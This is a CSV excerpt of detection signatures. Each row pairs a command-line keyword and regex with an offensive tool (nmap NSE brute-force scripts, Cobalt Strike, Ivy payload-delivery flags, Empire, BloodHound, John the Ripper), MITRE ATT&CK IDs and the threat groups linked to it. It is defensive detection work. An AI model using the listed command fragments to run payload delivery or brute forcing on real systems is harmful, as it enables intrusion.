"* ip-geolocation-maxmind.nse*",".{0,1000}\sip\-geolocation\-maxmind\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1767"
"* ip-https-discover.nse*",".{0,1000}\sip\-https\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1768"
"* ipidseq.nse*",".{0,1000}\sipidseq\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1769"
"* ipmi-brute.nse*",".{0,1000}\sipmi\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1770"
"* ipmi-cipher-zero.nse*",".{0,1000}\sipmi\-cipher\-zero\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1771"
"* ipmi-version.nse*",".{0,1000}\sipmi\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1772"
"* IPPrintC2.ps1*",".{0,1000}\sIPPrintC2\.ps1.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","1773"
"* IPV6 addresses xored *",".{0,1000}\sIPV6\saddresses\sxored\s.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","1774"
"* ipv6-multicast-mld-list.nse*",".{0,1000}\sipv6\-multicast\-mld\-list\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1775"
"* ipv6-node-info.nse*",".{0,1000}\sipv6\-node\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1776"
"* ipv6-ra-flood.nse*",".{0,1000}\sipv6\-ra\-flood\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1777"
"* irc-botnet-channels.nse*",".{0,1000}\sirc\-botnet\-channels\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1778"
"* irc-brute.nse*",".{0,1000}\sirc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1779"
"* irc-info.nse*",".{0,1000}\sirc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1780"
"* irc-sasl-brute.nse*",".{0,1000}\sirc\-sasl\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1781"
"* irc-unrealircd-backdoor.nse*",".{0,1000}\sirc\-unrealircd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1782"
"* is a C# tool for taking over Active Directory user and computer accounts by manipulating their *",".{0,1000}\sis\sa\sC\#\stool\sfor\staking\sover\sActive\sDirectory\suser\sand\scomputer\saccounts\sby\smanipulating\stheir\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","Whisker","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","1783"
"* is a C# tool for taking over Active Directory user and computer accounts by manipulating their *",".{0,1000}\sis\sa\sC\#\stool\sfor\staking\sover\sActive\sDirectory\suser\sand\scomputer\saccounts\sby\smanipulating\stheir\s.{0,1000}","offensive_tool_keyword","Whisker","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","Whisker","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","1784"
"* -isbeacon *",".{0,1000}\s\-isbeacon\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","1785"
"* iscsi-brute.nse*",".{0,1000}\siscsi\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1786"
"* iscsi-info.nse*",".{0,1000}\siscsi\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1787"
"* isns-info.nse*",".{0,1000}\sisns\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1788"
"* --isroca --publickey *",".{0,1000}\s\-\-isroca\s\-\-publickey\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1789"
"* -it bloodhound*",".{0,1000}\s\-it\sbloodhound.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","0","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","1790"
"* -Ix64 *.bin -Ix86 *.bin -P Inject -O *.png -stageless*",".{0,1000}\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sInject\s\-O\s.{0,1000}\.png\s\-stageless.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","1791"
"* -Ix64 *.bin -Ix86 *.bin -P Local -O *.hta -url http:* -delivery hta -stageless*",".{0,1000}\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-O\s.{0,1000}\.hta\s\-url\shttp\:.{0,1000}\s\-delivery\shta\s\-stageless.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","1792"
"* -Ix64 *.bin -Ix86 *.bin -P Local -O *.js -url http* -delivery bits -stageless*",".{0,1000}\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-O\s.{0,1000}\.js\s\-url\shttp.{0,1000}\s\-delivery\sbits\s\-stageless.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","1793"
"* -Ix64 *.bin -Ix86 *.bin -P Local -O *.txt -url http* -delivery macro -stageless*",".{0,1000}\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-O\s.{0,1000}\.txt\s\-url\shttp.{0,1000}\s\-delivery\smacro\s\-stageless.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","1794"
"* -Ix64 *.bin -Ix86 *.bin -P Local -O *.xsl -url http* -delivery xsl -stageless*",".{0,1000}\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-O\s.{0,1000}\.xsl\s\-url\shttp.{0,1000}\s\-delivery\sxsl\s\-stageless.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","1795"
"* -Ix64 *.c -Ix86 *.c -P Local -O *.js*",".{0,1000}\s\-Ix64\s.{0,1000}\.c\s\-Ix86\s.{0,1000}\.c\s\-P\sLocal\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","1796"
"* -Ix64 *.vba -Ix86 *.vba -P Inject -O *",".{0,1000}\s\-Ix64\s.{0,1000}\.vba\s\-Ix86\s.{0,1000}\.vba\s\-P\sInject\s\-O\s.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","1797"
"* -jar ysoserial.jar*",".{0,1000}\s\-jar\sysoserial\.jar.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","1799"
"* jdwp-exec.nse*",".{0,1000}\sjdwp\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1800"
"* jdwp-info.nse*",".{0,1000}\sjdwp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1801"
"* jdwp-inject.nse*",".{0,1000}\sjdwp\-inject\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1802"
"* jdwp-version.nse*",".{0,1000}\sjdwp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1803"
"* jecretz.py*",".{0,1000}\sjecretz\.py.{0,1000}","offensive_tool_keyword","jecretz","Jira Secret Hunter - Helps you find credentials and sensitive contents in Jira tickets","T1552 - T1114 - T1119 - T1070","TA0006 - TA0009 - TA0005","N/A","Scattered Spider*","Discovery","https://github.com/sahadnk72/jecretz","1","0","N/A","N/A","7","1","43","9","2022-12-08T10:00:11Z","2020-05-25T14:40:28Z","1804"
"* -JMXConsole -AppName *",".{0,1000}\s\-JMXConsole\s\-AppName\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Exploit-JBoss.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1805"
"* john_done*",".{0,1000}\sjohn_done.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1806"
"* john_fork*",".{0,1000}\sjohn_fork.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1807"
"* john_load*",".{0,1000}\sjohn_load.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1808"
"* john_load_conf*",".{0,1000}\sjohn_load_conf.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1809"
"* john_load_conf_db*",".{0,1000}\sjohn_load_conf_db.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1810"
"* john_log_format*",".{0,1000}\sjohn_log_format.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1811"
"* john_log_format2*",".{0,1000}\sjohn_log_format2.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1812"
"* john_mpi_wait*",".{0,1000}\sjohn_mpi_wait.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1813"
"* john_omp_fallback*",".{0,1000}\sjohn_omp_fallback.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1814"
"* john_omp_init*",".{0,1000}\sjohn_omp_init.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1815"
"* john_omp_maybe_adjust_or_fallback*",".{0,1000}\sjohn_omp_maybe_adjust_or_fallback.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1816"
"* john_omp_show_info*",".{0,1000}\sjohn_omp_show_info.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1817"
